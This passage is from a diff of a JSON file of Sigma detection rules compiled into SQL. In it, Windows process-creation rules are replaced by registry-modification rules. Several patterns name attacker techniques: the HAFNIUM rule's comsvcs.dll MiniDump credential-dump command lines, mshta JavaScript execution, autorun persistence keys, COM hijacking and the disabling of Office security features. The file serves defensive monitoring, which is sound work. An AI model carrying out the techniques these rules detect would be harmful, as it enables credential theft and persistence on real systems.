'C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\ngen.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tasks\\\\{B66B135D-DA06-4FC4-95F8-7458E1D10129}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows 
NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\.NET Framework\\\\.NET Framework NGEN%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Integration\\\\Integrator.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\Integration\\\\Integrator.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\PLA\\\\Server Manager Performance Monitor\\\\%' ESCAPE '\\') OR (NewProcessName = 'System')))" ], - "filename": "proc_creation_win_7zip_exfil_dmp_files.yml" + "filename": "registry_set_taskcache_entry.yml" }, { - "title": "MMC20 Lateral Movement", - "id": "f1f3bf22-deb2-418d-8cce-e1a45e46a5bd", - "status": "test", - "description": "Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of \"-Embedding\" as a child of svchost.exe", - "author": "@2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea)", + "title": "Potential Persistence Via Scrobj.dll COM Hijacking", + "id": "fe20dda1-6f37-4379-bbe0-a98d400cae90", + "status": "experimental", + "description": "Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1021.003" + "attack.persistence", + "attack.t1546.015" ], "falsepositives": [ - "Unlikely" + "Legitimate use of the dll." 
], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%InprocServer32\\\\(Default)' ESCAPE '\\' AND NewValue LIKE 'C:\\\\WINDOWS\\\\system32\\\\scrobj.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_mmc_mmc20_lateral_movement.yml" + "filename": "registry_set_persistence_scrobj_dll.yml" }, { - "title": "Suspicious Svchost Process", - "id": "01d2e2a1-5f09-44f7-9fc1-24faa7479b6d", - "status": "experimental", - "description": "Detects a suspicious svchost process start", - "author": "Florian Roth (Nextron Systems)", + "title": "Running Chrome VPN Extensions via the Registry 2 VPN Extension", + "id": "b64a026b-8deb-4c1d-92fd-98893209dff1", + "status": "test", + "description": "Running Chrome VPN Extensions via the Registry install 2 vpn extension", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1036.005" + "attack.persistence", + "attack.t1133" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NOT (((ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Mrt.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ngen.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (ParentProcessName = '') OR (ParentProcessName = '') OR (ParentProcessName = '-')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType 
LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%Software\\\\Wow6432Node\\\\Google\\\\Chrome\\\\Extensions%' ESCAPE '\\' AND TargetObject LIKE '%update\\_url' ESCAPE '\\' AND EventType = 'SetValue' AND (TargetObject LIKE '%fdcgdnkidjaadafnichfpabhfomcebme%' ESCAPE '\\' OR TargetObject LIKE '%fcfhplploccackoneaefokcmbjfbkenj%' ESCAPE '\\' OR TargetObject LIKE '%bihmplhobchoageeokmgbdihknkjbknd%' ESCAPE '\\' OR TargetObject LIKE '%gkojfkhlekighikafcpjkiklfbnlmeio%' ESCAPE '\\' OR TargetObject LIKE '%jajilbjjinjmgcibalaakngmkilboobh%' ESCAPE '\\' OR TargetObject LIKE '%gjknjjomckknofjidppipffbpoekiipm%' ESCAPE '\\' OR TargetObject LIKE '%nabbmpekekjknlbkgpodfndbodhijjem%' ESCAPE '\\' OR TargetObject LIKE '%kpiecbcckbofpmkkkdibbllpinceiihk%' ESCAPE '\\' OR TargetObject LIKE '%nlbejmccbhkncgokjcmghpfloaajcffj%' ESCAPE '\\' OR TargetObject LIKE '%omghfjlpggmjjaagoclmmobgdodcjboh%' ESCAPE '\\' OR TargetObject LIKE '%bibjcjfmgapbfoljiojpipaooddpkpai%' ESCAPE '\\' OR TargetObject LIKE '%mpcaainmfjjigeicjnlkdfajbioopjko%' ESCAPE '\\' OR TargetObject LIKE '%jljopmgdobloagejpohpldgkiellmfnc%' ESCAPE '\\' OR TargetObject LIKE '%lochiccbgeohimldjooaakjllnafhaid%' ESCAPE '\\' OR TargetObject LIKE '%nhnfcgpcbfclhfafjlooihdfghaeinfc%' ESCAPE '\\' OR TargetObject LIKE '%ookhnhpkphagefgdiemllfajmkdkcaim%' ESCAPE '\\' OR TargetObject LIKE '%namfblliamklmeodpcelkokjbffgmeoo%' ESCAPE '\\' OR TargetObject LIKE '%nbcojefnccbanplpoffopkoepjmhgdgh%' ESCAPE '\\' OR TargetObject LIKE '%majdfhpaihoncoakbjgbdhglocklcgno%' ESCAPE '\\' OR TargetObject LIKE '%lnfdmdhmfbimhhpaeocncdlhiodoblbd%' ESCAPE '\\' OR TargetObject LIKE '%eppiocemhmnlbhjplcgkofciiegomcon%' ESCAPE '\\' OR TargetObject LIKE '%cocfojppfigjeefejbpfmedgjbpchcng%' ESCAPE '\\' OR TargetObject LIKE '%foiopecknacmiihiocgdjgbjokkpkohc%' ESCAPE '\\' OR TargetObject LIKE '%hhdobjgopfphlmjbmnpglhfcgppchgje%' ESCAPE '\\' OR TargetObject LIKE '%jgbaghohigdbgbolncodkdlpenhcmcge%' ESCAPE 
'\\' OR TargetObject LIKE '%inligpkjkhbpifecbdjhmdpcfhnlelja%' ESCAPE '\\' OR TargetObject LIKE '%higioemojdadgdbhbbbkfbebbdlfjbip%' ESCAPE '\\' OR TargetObject LIKE '%hipncndjamdcmphkgngojegjblibadbe%' ESCAPE '\\' OR TargetObject LIKE '%iolonopooapdagdemdoaihahlfkncfgg%' ESCAPE '\\' OR TargetObject LIKE '%nhfjkakglbnnpkpldhjmpmmfefifedcj%' ESCAPE '\\' OR TargetObject LIKE '%jpgljfpmoofbmlieejglhonfofmahini%' ESCAPE '\\' OR TargetObject LIKE '%fgddmllnllkalaagkghckoinaemmogpe%' ESCAPE '\\' OR TargetObject LIKE '%ejkaocphofnobjdedneohbbiilggdlbi%' ESCAPE '\\' OR TargetObject LIKE '%keodbianoliadkoelloecbhllnpiocoi%' ESCAPE '\\' OR TargetObject LIKE '%hoapmlpnmpaehilehggglehfdlnoegck%' ESCAPE '\\' OR TargetObject LIKE '%poeojclicodamonabcabmapamjkkmnnk%' ESCAPE '\\' OR TargetObject LIKE '%dfkdflfgjdajbhocmfjolpjbebdkcjog%' ESCAPE '\\' OR TargetObject LIKE '%kcdahmgmaagjhocpipbodaokikjkampi%' ESCAPE '\\' OR TargetObject LIKE '%klnkiajpmpkkkgpgbogmcgfjhdoljacg%' ESCAPE '\\' OR TargetObject LIKE '%lneaocagcijjdpkcabeanfpdbmapcjjg%' ESCAPE '\\' OR TargetObject LIKE '%pgfpignfckbloagkfnamnolkeaecfgfh%' ESCAPE '\\' OR TargetObject LIKE '%jplnlifepflhkbkgonidnobkakhmpnmh%' ESCAPE '\\' OR TargetObject LIKE '%jliodmnojccaloajphkingdnpljdhdok%' ESCAPE '\\' OR TargetObject LIKE '%hnmpcagpplmpfojmgmnngilcnanddlhb%' ESCAPE '\\' OR TargetObject LIKE '%ffbkglfijbcbgblgflchnbphjdllaogb%' ESCAPE '\\' OR TargetObject LIKE '%kcndmbbelllkmioekdagahekgimemejo%' ESCAPE '\\' OR TargetObject LIKE '%jdgilggpfmjpbodmhndmhojklgfdlhob%' ESCAPE '\\' OR TargetObject LIKE '%bihhflimonbpcfagfadcnbbdngpopnjb%' ESCAPE '\\' OR TargetObject LIKE '%ppajinakbfocjfnijggfndbdmjggcmde%' ESCAPE '\\' OR TargetObject LIKE '%oofgbpoabipfcfjapgnbbjjaenockbdp%' ESCAPE '\\' OR TargetObject LIKE '%bhnhkdgoefpmekcgnccpnhjfdgicfebm%' ESCAPE '\\' OR TargetObject LIKE '%knmmpciebaoojcpjjoeonlcjacjopcpf%' ESCAPE '\\' OR TargetObject LIKE '%dhadilbmmjiooceioladdphemaliiobo%' ESCAPE '\\' OR TargetObject LIKE 
'%jedieiamjmoflcknjdjhpieklepfglin%' ESCAPE '\\' OR TargetObject LIKE '%mhngpdlhojliikfknhfaglpnddniijfh%' ESCAPE '\\' OR TargetObject LIKE '%omdakjcmkglenbhjadbccaookpfjihpa%' ESCAPE '\\' OR TargetObject LIKE '%npgimkapccfidfkfoklhpkgmhgfejhbj%' ESCAPE '\\' OR TargetObject LIKE '%akeehkgglkmpapdnanoochpfmeghfdln%' ESCAPE '\\' OR TargetObject LIKE '%gbmdmipapolaohpinhblmcnpmmlgfgje%' ESCAPE '\\' OR TargetObject LIKE '%aigmfoeogfnljhnofglledbhhfegannp%' ESCAPE '\\' OR TargetObject LIKE '%cgojmfochfikphincbhokimmmjenhhgk%' ESCAPE '\\' OR TargetObject LIKE '%ficajfeojakddincjafebjmfiefcmanc%' ESCAPE '\\' OR TargetObject LIKE '%ifnaibldjfdmaipaddffmgcmekjhiloa%' ESCAPE '\\' OR TargetObject LIKE '%jbnmpdkcfkochpanomnkhnafobppmccn%' ESCAPE '\\' OR TargetObject LIKE '%apcfdffemoinopelidncddjbhkiblecc%' ESCAPE '\\' OR TargetObject LIKE '%mjolnodfokkkaichkcjipfgblbfgojpa%' ESCAPE '\\' OR TargetObject LIKE '%oifjbnnafapeiknapihcmpeodaeblbkn%' ESCAPE '\\' OR TargetObject LIKE '%plpmggfglncceinmilojdkiijhmajkjh%' ESCAPE '\\' OR TargetObject LIKE '%mjnbclmflcpookeapghfhapeffmpodij%' ESCAPE '\\' OR TargetObject LIKE '%bblcccknbdbplgmdjnnikffefhdlobhp%' ESCAPE '\\' OR TargetObject LIKE '%aojlhgbkmkahabcmcpifbolnoichfeep%' ESCAPE '\\' OR TargetObject LIKE '%lcmammnjlbmlbcaniggmlejfjpjagiia%' ESCAPE '\\' OR TargetObject LIKE '%knajdeaocbpmfghhmijicidfcmdgbdpm%' ESCAPE '\\' OR TargetObject LIKE '%bdlcnpceagnkjnjlbbbcepohejbheilk%' ESCAPE '\\' OR TargetObject LIKE '%edknjdjielmpdlnllkdmaghlbpnmjmgb%' ESCAPE '\\' OR TargetObject LIKE '%eidnihaadmmancegllknfbliaijfmkgo%' ESCAPE '\\' OR TargetObject LIKE '%ckiahbcmlmkpfiijecbpflfahoimklke%' ESCAPE '\\' OR TargetObject LIKE '%macdlemfnignjhclfcfichcdhiomgjjb%' ESCAPE '\\' OR TargetObject LIKE '%chioafkonnhbpajpengbalkececleldf%' ESCAPE '\\' OR TargetObject LIKE '%amnoibeflfphhplmckdbiajkjaoomgnj%' ESCAPE '\\' OR TargetObject LIKE '%llbhddikeonkpbhpncnhialfbpnilcnc%' ESCAPE '\\' OR TargetObject LIKE '%pcienlhnoficegnepejpfiklggkioccm%' 
ESCAPE '\\' OR TargetObject LIKE '%iocnglnmfkgfedpcemdflhkchokkfeii%' ESCAPE '\\' OR TargetObject LIKE '%igahhbkcppaollcjeaaoapkijbnphfhb%' ESCAPE '\\' OR TargetObject LIKE '%njpmifchgidinihmijhcfpbdmglecdlb%' ESCAPE '\\' OR TargetObject LIKE '%ggackgngljinccllcmbgnpgpllcjepgc%' ESCAPE '\\' OR TargetObject LIKE '%kchocjcihdgkoplngjemhpplmmloanja%' ESCAPE '\\' OR TargetObject LIKE '%bnijmipndnicefcdbhgcjoognndbgkep%' ESCAPE '\\' OR TargetObject LIKE '%lklekjodgannjcccdlbicoamibgbdnmi%' ESCAPE '\\' OR TargetObject LIKE '%dbdbnchagbkhknegmhgikkleoogjcfge%' ESCAPE '\\' OR TargetObject LIKE '%egblhcjfjmbjajhjhpmnlekffgaemgfh%' ESCAPE '\\' OR TargetObject LIKE '%ehbhfpfdkmhcpaehaooegfdflljcnfec%' ESCAPE '\\' OR TargetObject LIKE '%bkkgdjpomdnfemhhkalfkogckjdkcjkg%' ESCAPE '\\' OR TargetObject LIKE '%almalgbpmcfpdaopimbdchdliminoign%' ESCAPE '\\' OR TargetObject LIKE '%akkbkhnikoeojlhiiomohpdnkhbkhieh%' ESCAPE '\\' OR TargetObject LIKE '%gbfgfbopcfokdpkdigfmoeaajfmpkbnh%' ESCAPE '\\' OR TargetObject LIKE '%bniikohfmajhdcffljgfeiklcbgffppl%' ESCAPE '\\' OR TargetObject LIKE '%lejgfmmlngaigdmmikblappdafcmkndb%' ESCAPE '\\' OR TargetObject LIKE '%ffhhkmlgedgcliajaedapkdfigdobcif%' ESCAPE '\\' OR TargetObject LIKE '%gcknhkkoolaabfmlnjonogaaifnjlfnp%' ESCAPE '\\' OR TargetObject LIKE '%pooljnboifbodgifngpppfklhifechoe%' ESCAPE '\\' OR TargetObject LIKE '%fjoaledfpmneenckfbpdfhkmimnjocfa%' ESCAPE '\\' OR TargetObject LIKE '%aakchaleigkohafkfjfjbblobjifikek%' ESCAPE '\\' OR TargetObject LIKE '%dpplabbmogkhghncfbfdeeokoefdjegm%' ESCAPE '\\' OR TargetObject LIKE '%padekgcemlokbadohgkifijomclgjgif%' ESCAPE '\\' OR TargetObject LIKE '%bfidboloedlamgdmenmlbipfnccokknp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_svchost_susp_parent_process.yml" + "filename": "registry_set_chrome_extension.yml" }, { - "title": "Renamed ZOHO Dctask64 Execution", - "id": "340a090b-c4e9-412e-bb36-b4b16fe96f9b", - "status": "test", - "description": "Detects a renamed dctask64.exe used for process 
injection, command execution, process creation with a signed binary by ZOHO Corporation", - "author": "Florian Roth (Nextron Systems)", + "title": "CurrentVersion NT Autorun Keys Modification", + "id": "cbf93e5d-ca6c-4722-8bea-e9119007c248", + "status": "experimental", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1055.001", - "attack.t1202", - "attack.t1218" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unknown yet" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND Hashes LIKE '%6834B1B94E49701D77CCB3C0895E1AFD%' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\dctask64.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Winlogon\\\\VmApplet%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\Userinit%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\Taskman%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\Shell%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\GpExtensions%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\AppSetup%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\AlternateShells\\\\AvailableShells%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\IconServiceLib%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Appinit\\_Dlls%' ESCAPE 
'\\' OR TargetObject LIKE '%\\\\Image File Execution Options%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Font Drivers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Drivers32%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Run%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Load%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)') OR (TargetObject LIKE '%\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\DisableExceptionChainValidation' ESCAPE '\\' OR TargetObject LIKE '%\\\\MitigationOptions' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Temp\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\') OR ((TargetObject LIKE '%\\\\ClickToRunStore\\\\HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ClickToRun\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Winlogon\\\\GPExtensions\\\\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\\\\PreviousPolicyAreas%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\GPExtensions\\\\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\\\\MaxNoGPOListChangesInterval%' ESCAPE '\\') AND NewValue IN ('DWORD (0x00000009)', 'DWORD (0x000003c0)')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE 
'\\' AND NewProcessName LIKE '%\\\\ngen.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\StandaloneUpdater\\\\OneDriveSetup.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\Delete Cached Update Binary' ESCAPE '\\' AND NewValue LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /q /c del /q \"C:\\\\Users\\\\%' ESCAPE '\\' AND NewValue LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\Update\\\\OneDriveSetup.exe\"' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_dctask64.yml" + "filename": "registry_set_asep_reg_keys_modification_currentversion_nt.yml" }, { - "title": "HAFNIUM Exchange Exploitation Activity", - "id": "bbb2dedd-a0e3-46ab-ba6c-6c82ae7a9aa7", - "status": "test", - "description": "Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Persistence Via TypedPaths", + "id": "086ae989-9ca6-4fe7-895a-759c5544f247", + "status": "experimental", + "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. 
Which might indicate persistence attempt", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1546", - "attack.t1053" + "attack.persistence" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%attrib%' ESCAPE '\\' AND CommandLine LIKE '% +h %' ESCAPE '\\' AND CommandLine LIKE '% +s %' ESCAPE '\\' AND CommandLine LIKE '% +r %' ESCAPE '\\' AND CommandLine LIKE '%.aspx%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\ProgramData\\\\VSPerfMon\\\\%' ESCAPE '\\' OR (CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%VSPerfMon%' ESCAPE '\\')) OR (NewProcessName LIKE '%Opera\\_browser.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\')) OR NewProcessName LIKE '%Users\\\\Public\\\\opera\\\\Opera\\_browser.exe' ESCAPE '\\' OR (CommandLine LIKE '%vssadmin list shadows%' ESCAPE '\\' AND CommandLine LIKE '%Temp\\\\\\_\\_output%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\makecab.exe' ESCAPE '\\' AND CommandLine LIKE '%inetpub\\\\wwwroot\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.dmp.zip%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\makecab.exe' ESCAPE '\\' AND (CommandLine LIKE '%Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' OR CommandLine LIKE '%compressionmemory%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\')) OR (CommandLine LIKE '% -t7z %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Programdata\\\\pst%' ESCAPE '\\' AND CommandLine LIKE '%\\\\it.zip%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\comsvcs.dll%' ESCAPE '\\' AND CommandLine LIKE '%Minidump%' ESCAPE '\\' AND CommandLine LIKE '%full %' ESCAPE '\\' AND CommandLine LIKE '%\\\\inetpub\\\\wwwroot%' ESCAPE '\\') OR (CommandLine LIKE '%Windows\\\\Temp\\\\xx.bat%' ESCAPE '\\' OR CommandLine LIKE '%Windows\\\\WwanSvcdcs%' ESCAPE '\\' OR CommandLine 
LIKE '%Windows\\\\Temp\\\\cw.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\TypedPaths\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\explorer.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_hafnium.yml" + "filename": "registry_set_persistence_typed_paths.yml" }, { - "title": "Suspicious JavaScript Execution Via Mshta.EXE", - "id": "67f113fa-e23d-4271-befa-30113b3e08b1", + "title": "Disable Microsoft Office Security Features", + "id": "7c637634-c95d-4bbf-b26c-a82510874b34", "status": "test", - "description": "Detects execution of javascript code using \"mshta.exe\".", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "description": "Disable Microsoft Office Security Features by registry", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218.005" + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND CommandLine LIKE '%javascript%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%VBAWarnings' ESCAPE '\\' OR TargetObject LIKE '%DisableInternetFilesInPV' ESCAPE '\\' OR TargetObject LIKE '%DisableUnsafeLocationsInPV' ESCAPE '\\' OR TargetObject LIKE '%DisableAttachementsInPV' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" ], - 
"filename": "proc_creation_win_mshta_javascript.yml" + "filename": "registry_set_disable_microsoft_office_security_features.yml" }, { - "title": "Directory Removal Via Rmdir", - "id": "41ca393d-538c-408a-ac27-cf1e038be80c", + "title": "Add DisallowRun Execution to Registry", + "id": "275641a5-a492-45e2-a817-7c81e9d9d3e9", "status": "experimental", - "description": "Detects execution of the builtin \"rmdir\" command in order to delete directories.\nAdversaries may delete files left behind by the actions of their intrusion activity.\nMalware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.\nRemoval of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.\n", + "description": "Detect set DisallowRun to 1 to prevent user running specific computer program", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1070.004" + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%rmdir%' ESCAPE '\\' AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%/q%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\DisallowRun' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_cmd_rmdir_execution.yml" + "filename": "registry_set_disallowrun_execution.yml" }, { - "title": "PsExec Default Named Pipe", - "id": "f3f3a972-f982-40ad-b63c-bca6afdfad7c", - "status": "test", - "description": "Detects PsExec 
service installation and execution events (service and Sysmon)", - "author": "Thomas Patzke", + "title": "Modify User Shell Folders Startup Value", + "id": "9c226817-8dc9-46c2-a58d-66655aafd7dc", + "status": "experimental", + "description": "Detect modification of the startup key to a path where a payload could be stored to be launched during startup", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1547.001" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE PipeName LIKE '\\\\PSEXESVC' ESCAPE '\\'" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders%' ESCAPE '\\' AND TargetObject LIKE '%Startup' ESCAPE '\\')" ], - "filename": "pipe_created_psexec_default_pipe.yml" + "filename": "registry_set_susp_user_shell_folders.yml" }, { - "title": "PsExec Pipes Artifacts", - "id": "9e77ed63-2ecf-4c7b-b09d-640834882028", - "status": "test", - "description": "Detecting use PsExec via Pipe Creation/Access to pipes", - "author": "Nikita Nazarov, oscd.community", + "title": "CurrentVersion Autorun Keys Modification", + "id": "20f0ee37-5942-4e45-b7d5-c5b5db9df5cd", + "status": "experimental", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.execution", - "attack.t1569.002" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Legitimate Administrator activity" + "Legitimate software automatically (mostly, during 
